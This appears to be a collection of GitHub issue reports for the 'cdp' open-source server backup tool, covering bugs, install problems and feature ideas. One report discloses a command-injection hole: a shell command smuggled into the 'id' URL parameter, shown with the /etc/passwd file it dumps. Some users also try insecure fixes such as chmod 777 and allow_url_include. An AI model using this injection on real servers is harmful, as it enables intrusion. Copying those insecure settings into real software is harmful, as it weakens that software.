petabyet / cdp
Simple & Open Source Server Backups
Home Page: https://cdp.me
License: GNU General Public License v2.0
can not chdir(/var/spool/clientmqueue/): Permission denied
Message could not be sent.
Mailer Error: Could not instantiate mail function.
I'm having an issue where, when 2-factor authentication is enabled, I can still log in without using the generated token.
simple_html_dom is a very old library with several bugs and is unmaintained. I recommend using the querypath library instead: it is actively maintained and uses jQuery-style APIs.
https://github.com/technosophos/querypath
Thanks.
There is very little feedback during the install process, but I get:
UPDATING YOUR SYSTEM, followed by
RPMDB altered outside of Yum (which I know I can ignore), but then, after a long wait, I see a few rm statements followed by "no such file or directory..." and the console hangs. I left my SSH session up for two hours with no progress.
If this issue is due to me trying to install via an SSH session, then you need to specify in your instructions that this must be done via CONSOLE ONLY.
I set up a backup job to back up a folder of about 3.4 GB, with auto-delete set to 30 days.
But it didn't do a full backup every 30 days; all files under /var/www/files are smaller than 60 MB.
There is no full-version backup.
I don't know how restore works, but 30 × 60 MB < 3.4 GB.
I think it needs to keep two full backups to make it possible to restore to any given day within the 30 days.
Please make CDP provide a way to see the files inside backups and restore them per file/directory. For example: I want to check whether /etc/any.conf exists and restore it to the original node or to another one.
Tar provides a way to list all files inside a tarball; you can find it in the tar(1) man page:
tar -tvf archive.tar
# List all files in archive.tar verbosely.
This should work for compressed files as well. Just put the flag that matches the compression algorithm that you have used:
$ tar -ztvf sometarfile.tar.gz
or
$ tar -jtvf sometarfile.tar.bz2
or any other algorithm.
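As a side note (assuming GNU tar, which auto-detects the compression format when reading), you don't even need the compression flag just to list an archive:

```shell
# GNU tar auto-detects gzip/bzip2/xz when reading, so plain -tf lists any of them.
mkdir -p /tmp/tardemo && echo hi > /tmp/tardemo/file.txt
tar -czf /tmp/tardemo.tar.gz -C /tmp tardemo
tar -tf /tmp/tardemo.tar.gz   # no -z needed when only listing
```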
If you are compressing with gzip, or just putting files together without compressing, you can use less:
$ less sometarfile.tar.gz
less provides a very graceful output, just like ls -l. And tar has a function to pull just one file or directory from an archive too:
$ tar -zxvf sometarfile.tar.gz somedir/subdir/justafile
If you want to pull a directory, you use the same command but point to the directory path inside the tar file. Note that you don't use a / at the beginning of the internal tar directory path:
$ tar -zxvf sometarfile.tar.gz somedir/subdir/
This works for any compression algorithm used to compress the tarball. You can also extract all files that match a wildcard inside the tar file:
tar -zxvf sometarfile.tar.gz --wildcards --no-anchored '*.conf'
Or the same wildcard inside a specific dir:
tar -zxvf sometarfile.tar.gz somedir/subdir/ --wildcards '*.conf'
Thank you for your time.
I have tried two different servers (different locations, Debian/Ubuntu fresh install + CDP) to back up whole Linux clients (source "/").
When I try to create a manual backup, gzip stops at around 113 MB and no data gets transferred. I have tried to back up 2 different Linux clients (haphost and a Core i7 with 6 GB RAM ...).
Can anyone help me?
It would be nice to have the MySQL backup offer the option of backing up all databases, maybe by specifying a defined keyword in the directories text box.
I can code this, if you would like.
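To sketch how such a keyword could work (the keyword `__ALL__` and the helper below are hypothetical, not part of CDP), the backend would simply map it to mysqldump's `--all-databases` flag:

```shell
# Hypothetical reserved keyword that selects every database.
ALL_KEYWORD="__ALL__"

# Map the text-box value to mysqldump arguments.
build_dump_args() {
  if [ "$1" = "$ALL_KEYWORD" ]; then
    echo "--all-databases --single-transaction"
  else
    echo "--databases $1"
  fi
}

build_dump_args "__ALL__"     # → --all-databases --single-transaction
build_dump_args "wordpress"   # → --databases wordpress
```

The resulting arguments would then be passed to mysqldump along with the usual credentials.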
When I edit the password of a user, or add a new user in user management, I am not able to log in with that data, even if the password and username are right.
I only get this error: Login failed.
I recommend that when you get to a point that you think this app needs a rewrite, that you look at using a framework to structure it. I personally use Yii2, but there are many options.
MVC keeps things very clean and generally frameworks help prevent common security holes.
In a VM of Ubuntu 14.04 server, freshly installed.
The command you suggest will not work: '-q0' isn't recognized by wget.
Then, in the script, '-s' and '-n' aren't recognized by read.
The home page's "Last 10 Backup Logs" shows a "No such file" error:
file_get_contents(/var/www/xxx/public/cdp/includes/db-backuplog.json): failed to open stream: No such file or directory in /var/www/xxx/public/cdp/includes/home.php on line 69
And yes, there is indeed no such file.
It backs up cPanel, but I can't see anything if I click "view backup".
/dev/fd/63: line 122: curl: command not found
Update your script to also install curl :)
will it support multi user and support backup to backblaze?
It doesn't really matter if someone goes directly to your config.php file, as it should never "echo" anything out to the page. However, if you must deny access to files such as this being viewed directly, consider doing this better as such:
In index.php (or the normal entry points):
define('CDP', true);
In files you want to deny direct access to:
if (!defined('CDP')) {
    exit; // Show a 403 here?
}
You should not wrap your entire script in an if, just bail out!
When attempting to restore I get
`Backup restore job (cdpme-2016-08-24-09-29-01-79c6aec5d961f136cf3014e9c6407ffd.tar.gz) started
Initiating backup restore...
1Transferring the file
tar (child): /cdpme-2016-08-24-09-29-01-79c6aec5d961f136cf3014e9c6407ffd.tar.gz: Cannot open: No such file or directory
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now
Success! Backup restored.`
The file cdpme-2016-08-24-09-29-01-79c6aec5d961f136cf3014e9c6407ffd.tar.gz exists in /var/www/files
Instead of tar + gzip compression, how about support for parallel multi-threaded compression such as pigz (parallel gzip), lbzip2, and pbzip2? http://vbtechsupport.com/1614/
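For what it's worth, pigz is close to a drop-in: its output is ordinary gzip format, so existing restore code keeps working. A sketch (GNU tar assumed; falls back to gzip when pigz is absent):

```shell
# Pick a parallel compressor when present; pigz output is plain gzip format.
COMP=$(command -v pigz || command -v gzip)
mkdir -p /tmp/pigzdemo && echo data > /tmp/pigzdemo/f.txt
tar -cf /tmp/pigzdemo.tar.gz --use-compress-program="$COMP" -C /tmp pigzdemo
tar -tf /tmp/pigzdemo.tar.gz   # listing auto-detects the compression
```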
Hello,
I've set up a CDP.me test environment.
I'm trying to do a full backup via the web interface (Backup Now) and it doesn't work, but if I run cron.php manually via the terminal it works well.
I noticed a difference in the cdp debug output...
Web output:
/root/test.file
1
Backup completed in 9 seconds.
Processing backup auto-delete
Terminal output:
/root/test.file
1
1
1
Backup completed in 14 seconds.
Processing backup auto-delete
When you select MySQL, I want to back up all DBs, but it says I must enter at least 1 DB, even though the form says "Leave tables empty if you want a backup of all tables."
Some 'minimal' installs don't include wget and curl by default.
Error after installing cdp:
/dev/fd/63: line 122: curl: command not found
How about adding curl and wget to the apt-get (line 43) / yum (line 63) install lines?
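A minimal pre-flight check the installer could run (the `need` helper below is illustrative, not existing CDP code):

```shell
# Report any tool the installer shells out to that is missing from PATH.
need() { command -v "$1" >/dev/null 2>&1 || echo "missing: $1"; }
need curl
need wget
# The installer could then add the missing names to its existing
# apt-get install / yum install lines before continuing.
```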
When running a file backup I'm getting the error:
Fatal error: Allowed memory size of 3145728000 bytes exhausted (tried to allocate 1773227473 bytes) in /var/www/html/libs/phpseclib/Crypt/Base.php on line 1350
What settings would need to be changed to correct this?
Thanks
This script has many bugs; a list of them:
Create another repo to put the install script in. That way other users can contribute to it as well, and you make it clearer to everyone what you are doing to it, when, and how. It's not a difficult job, so I hope that you accept this advice :)
Hello,
When trying to back up a database on a remote server, I'm getting the below error:
Warning: mysql_connect(): Lost connection to MySQL server at 'reading initial communication packet', system error: 0 in /var/www/html/cron.php on line 211
Message has been sent
I can telnet into the remote server on port 3306 / ping / checked password
Cheers
Hi!
Just a thought on naming: in the User edit form a button is labeled Submit; most other places would use Save as the label.
Consider changing the field label Google Authenticator Key to 2-Factor Authentication Key, as Google Authenticator is not the only application that can generate OTPs. I personally like Authy, since you can sync your accounts between devices and protect the app with a password or PIN.
Thanks for your time and work on CDP!
Frederick
Hi!
I have yet to make one successful backup with this program. I tried via SSH and it is not working; I will file a separate issue for that if needed. I am still trying to get some output as to why this is not working.
I am getting the following in the email after the backup attempt:
Backup job (8543a3c0704cfb6d3b8eff592ca6539d) started
Starting cPanel backup
Backup started, waiting for it to finish
Backup found, continuing
Creating temporary FTP account for backup transfer
Temporary FTP Account created
Error downloading backup
I ran this via the cron jobs in Webmin which gave this helpful information:
Output from command /usr/bin/php /home/meos/domains/cdp.meosch.tk/public_html/cron.php 8543a3c0704cfb6d3b8eff592ca6539d ..
Array
(
[type] => 2
[message] => ftp_get(): Error opening cdpme-2016-01-22-19-35-31-backup-1.22.2016_19-15-25_meosch.tar.gz
[file] => /home/meos/domains/cdp.meosch.tk/public_html/cron.php
[line] => 474
)
Message has been sent
I investigated and found that 3 backup files had been created, but not with the full file name as above (cdpme-2016-01-22-19-35-31-backup-1.22.2016_19-15-25_meosch.tar.gz):
$ ls -l |grep .tar.gz
-rw------- 1 meosch meosch 2678233622 Jan 22 20:20 backup-1.22.2016_19-15-25_meosch.tar.gz
-rw------- 1 meosch meosch 2678206087 Jan 22 20:38 backup-1.22.2016_19-33-42_meosch.tar.gz
-rw------- 1 meosch meosch 2678263759 Jan 22 20:40 backup-1.22.2016_19-35-31_meosch.tar.gz
$
cdpme-2016-01-22-19-35-31-backup-1.22.2016_19-15-25_meosch.tar.gz is not equal to backup-1.22.2016_19-15-25_meosch.tar.gz.
Not sure where I could have configured this wrong for it to do this.
Any help in getting this working would be appreciated!
Frederick
Can you please add an Alias feature? Instead of selecting the IP address from a drop-down, show it as
Server1 - (IP Address). That will make it a lot easier to select servers to back up.
After adding backup jobs, running them manually as root from the command line works, but clicking Backup Now in the job always fails; it seems to be a permission issue when creating the backup .tar.gz file under the files folder.
I've already run chmod 777 on files and chown -R www-data:www-data on the cdp folder,
and also enabled fopen in php.ini as below:
allow_url_fopen = On
allow_url_include = On
But it always fails. Any suggestion on how to configure the permissions?
Backup task is running in the background
Warning: fopen(cdpme-2014-11-12-06-47-20-4bfbb1c2f*********f5f61fb5a.tar.gz): failed to open stream: Permission denied in /var/www/****/public/cdp/phpseclib/Net/SFTP.php on line 2026
Warning: rename(cdpme-2014-11-12-06-47-20-4bfbb1c2f*********f5f61fb5a.tar.gz,/var/www/**/public/cdp/files/cdpme-2014-11-12-06-47-20-4bfbb1c2f*******f5f61fb5a.tar.gz): No such file or directory in /var/www/****/public/cdp/cron.php on line 130
Warning: filesize(): stat failed for /var/www//public/cdp/files/cdpme-2014-11-12-06-47-20-4bfbb1c2f**_f5f61fb5a.tar.gz in /var/www/_**/public/cdp/cron.php on line 139
Simple enough really, if you require GD, check for it.
if (!function_exists('gd_info')) {
    die('PHP extension GD is required!');
}
Backup task has been started, please do not close this window
Warning: fopen(cdpme-2014-12-07-22-49-28-eb57afb248107.tar.gz): failed to open stream: Permission denied in /var/www/libs/phpseclib/Net/SFTP.php on line 2026
Warning: rename(cdpme-2014-12-07-22-49-28-eb57afbab88107.tar.gz,/var/www/files/cdpme-2014-12-07-22-49-28-eb5104c07.tar.gz): No such file or directory in /var/www/cron.php on line 186
Warning: file_get_contents(/var/www/files/cdpme-2014-12-07-22-49-28-eb57afb18107.tar.gz): failed to open stream: No such file or directory in /var/www/cron.php on line 191
Message has been sent
Hi!
Please consider adding the option to download the Cpanel backup files via SSH as an alternative to the current FTP option.
Thanks for considering this!
Frederick
I know that this is on your to-do list for CDP, so I want to present a really good way to do backup replication using Unison (http://www.cis.upenn.edu/~bcpierce/unison/). Unison is a tool that is available for Windows and present in the repositories of many flavors of Unix (Solaris, Linux, OS X, etc.).
So, I will assume that you already have Unison installed (or know how to do this).
First of all, you need to set the UNISON environment variable so that Unison will look for *.prf (profile) files in the correct location, preferably one that isn't world-readable. So we will create the unison directory under /etc/ and add the UNISON variable to the environment:
# mkdir -p /etc/unison/
# touch /etc/profile.d/unison.sh
# echo '#!/usr/bin/env bash' >> /etc/profile.d/unison.sh && echo 'UNISON=/etc/unison/' >> /etc/profile.d/unison.sh
# chmod +x /etc/profile.d/unison.sh
After that, we need to create a *.prf file to tell Unison what we will ask it to do. These files are pretty simple to build and can make Unison replicate the backups to more than one server at once. Let me show you an example. First we will create the .prf file inside the /etc/unison/ directory:
# We will set here all directories that we will use
root = /var/www/html/files/my_server_backup_dir
root = ssh://[email protected]//directory/at/other/server
root = ssh://[email protected]//directory/at/other/server
# Obviously, to use SSH without passwords you need to pass the SSH keys to unison and any other SSH argument needed to make a connection to your remote servers.
# If you have a passphrase at your key, you will need to setup ssh-agent or keychain to provide it.
sshargs = -i /home/user/.ssh/id_rsa -p 2222
# As we want just one-way mirroring from this server to the others, specify the source replica using "force" as follows.
# Note that the directory you write here should also be listed as a root above:
force = /var/www/html/files/my_server_backup_dir
# We want Unison to run without any user input so we will use "batch" mode.
batch = true
# We don't want to be prompted and will just accept Unison's recommendation:
auto = true
# We want modification times (but not directory modtimes) to be propagated.
times = true
Save this file as /etc/unison/myfirstserver.com.prf,
and now you can sync the files in this directory to all servers listed in the *.prf using:
unison myfirstserver.com
This should produce output like this:
Contacting server...
Connected [//local//home/alice/sync_folder -> //remote_host//home/alice/sync_folder]
Looking for changes
Waiting for changes from server
Reconciling changes
new file --> document1.pdf
<-- new file my.jpg
Propagating updates
UNISON 2.40.63 started propagating changes at 21:19:13.65 on 20 Sep 2013
[BGN] Copying document1.pdf from /var/www/html/files/my_server_backup_dir to my-other-server.info//directory/at/other/server
[BGN] Copying my.jpg from //remote_host//home/alice/sync_folder to /home/alice/sync_folder
[END] Copying my.jpg
[END] Copying document1.pdf
UNISON 2.40.63 finished propagating changes at 21:19:13.68 on 20 Sep 2013
Saving synchronizer state
Synchronization complete at 21:19:13 (2 items transferred, 0 skipped, 0 failed)
Unison will sync the file permissions and owner:group by default. So, if you are transferring files that will be put in a protected directory, the user that you use to log in over SSH needs to have the right permissions. You can pass all these options directly on one big command line, but this isn't really recommended.
This could be used for backup restoration as well; you just need to change the root options to match what you need.
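To run this replication unattended (a sketch; the schedule and log path below are arbitrary choices, not requirements), a cron entry could invoke the profile nightly:

```shell
# crontab fragment: sync the profile above every night at 02:30.
30 2 * * * UNISON=/etc/unison unison myfirstserver.com -batch >> /var/log/unison-backup.log 2>&1
```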
Hi there,
I don't mean to sound rude, but in my opinion it's extremely bad practice to do any shell_exec in PHP code; there are many ways to avoid this throughout your project.
There are a fair few holes in the project and a bunch of really bad practices too. I would suggest taking another look at the code base if you plan on positioning this as more than just a prototype/POC and as actually production-friendly :)
Anyway, as a proof of concept, when a user is logged in:
http://123.123.123.123/index.php?action=runbackup&id=;%20cat%20/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
messagebus:x:102:103::/var/run/dbus:/bin/false
All the best :)
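For reference, the usual fix for the hole demonstrated above is to never interpolate request parameters into a shell command: validate against a strict whitelist (the job ids appear to be lowercase hex), or at minimum pass them through escapeshellarg() in PHP. The same whitelist check, sketched here in shell:

```shell
# Accept only non-empty lowercase-hex ids; reject everything else.
validate_id() {
  case "$1" in
    *[!a-f0-9]*|"") echo "invalid" ;;
    *) echo "ok" ;;
  esac
}
validate_id "a4add846bb3813066b8ec61e1be0e379"   # → ok
validate_id "; cat /etc/passwd"                  # → invalid
```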
Please kindly let me know if there is any fix for this, as I'm getting the same error on two nodes:
Backup job (a4add846bb3813066b8ec61e1be0e379) started
Starting OpenVZ backup
OpenVZ detected
vzdump detected
ProxMox detected
Backing up CT 101
Unknown option: mode
usage: /usr/sbin/vzdump OPTIONS [--all | VMID]
--exclude VMID exclude VMID (assumes --all)
--exclude-path REGEX exclude certain files/directories
--stdexcludes exclude temorary files and logs
--compress compress dump file (gzip)
--dumpdir DIR store resulting files in DIR
--maxfiles N maximal number of backup files per VM
--script FILENAME execute hook script
--storage STORAGE_ID store resulting files to STORAGE_ID (PVE only)
--tmpdir DIR store temporary files in DIR
--mailto EMAIL send notification mail to EMAIL.
--quiet be quiet.
--stop stop/start VM if running
--suspend suspend/resume VM when running
--snapshot use LVM snapshot when running
--size MB LVM snapshot size
--node CID only run on pve cluster node CID
--lockwait MINUTES maximal time to wait for the global lock
--stopwait MINUTES maximal time to wait until a VM is stopped
--bwlimit KBPS limit I/O bandwidth; KBytes per second
mv: cannot stat `vzdump-openvz-*.tgz': No such file or directory
vzdump-101.tgz not found
Apr 14 14:04:25 eu sshd[524398]: pam_unix(sshd:session): session opened for user root by (uid=0)
Apr 14 21:35:24 eu sshd[950575]: Received disconnect from 192.168.1.1: 11:
Hey PetaByet, great script. After I ran chown -R apache:apache /var/www/html/, everything was working great: the script pulls the remote directory we specify. However, we have been unable to get your CDP.me script to actually pull down MySQL (we have everything configured correctly for remote access on the other side).
It will only pull the first 339 bytes of the MySQL database:
DROP TABLE wp_yith_wcwl;
CREATE TABLE wp_yith_wcwl ( ID int(11) NOT NULL AUTO_INCREMENT, prod_id int(11) NOT NULL, quantity int(11) NOT NULL, user_id int(11) NOT NULL, dateadded timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, PRIMARY KEY (ID), KEY product (prod_id) ) ENGINE=MyISAM DEFAULT CHARSET=utf8;
The e-mail report says:
Backup job (df340171bc723ec40ac5b19de0b5fc23) started Starting SQL backup MySQL query error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
We are running MySQL 5.5 with cPanel on this specific test server.
Thank you.
Hi!
Editing users currently does not work as expected. I see the following issues:
[{"id":"1","username":"admin","password":"da7409e901e899b2d03e08ca2dbf6eea","acl":"1","2fo":"false","2fokey":""}]
[{"id":"1","username":"Backupadmin","password":"d41d8cd98f00b204e9800998ecf8427e","acl":"1","2fo":"true","2fokey":""}]
CDP tries to encrypt a blank password; #33 is a related issue.
The way things are now, any change to the user's account made by clicking the Submit button means a new 2-Factor Authentication key must be generated and then entered into the app you are using to generate the OTP.
I hope this is all understandable and helpful!
Frederick
When editing a user on the 'Users' page, the password box says "Only enter if you want to change the password". If this is left blank, CDP will try to encrypt the blank password (or some other behaviour), changing the password hash and locking you out.
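The blank-password behaviour is easy to confirm from the hashes pasted in the related report: d41d8cd98f00b204e9800998ecf8427e is exactly the MD5 of an empty string.

```shell
# MD5 of the empty string — the hash stored after editing a user with a blank password box.
printf '' | md5sum | awk '{print $1}'   # → d41d8cd98f00b204e9800998ecf8427e
```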
I installed CDP on a fresh server, added servers (from OpenVZ and MySQL to cPanel), created backup jobs, and added cron jobs for all of them, but none of the backups can finish. Example logs are below:
Backup completed in 44 seconds.
Processing backup auto-delete
But on the cdp.me panel that backup shows "none file found".
this is log for cpanel
Starting cPanel backup
Backup started, waiting for it to finish
Backup is not available yet, waiting 30 seconds and re-try.
Re-trying
Backup found, continuing
Creating temporary FTP account for backup transfer
Temporary FTP Account created
Error downloading backup
The same, or similar, happens for any type of backup that I try...
Can you tell me what the problem is, or how to solve this?
P.S. The backup server's IP address is whitelisted on all servers to be backed up.
The installation script does something like this:
cd /var/www/
git clone https://github.com/PetaByet/cdp.git
rm -rf html
mv cdp html
So if you have a website running in /var/www/html, it will be vaporized.
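A defensive sketch for the installer (the `safe_target` helper is hypothetical, not existing CDP code): refuse to touch an install path that already exists instead of rm -rf'ing it.

```shell
# Abort instead of overwriting an existing directory such as /var/www/html.
safe_target() {
  if [ -e "$1" ]; then
    echo "refusing to overwrite existing $1" >&2
    return 1
  fi
}
# The installer would then do something like:
#   safe_target /var/www/html && git clone https://github.com/PetaByet/cdp.git /var/www/html
```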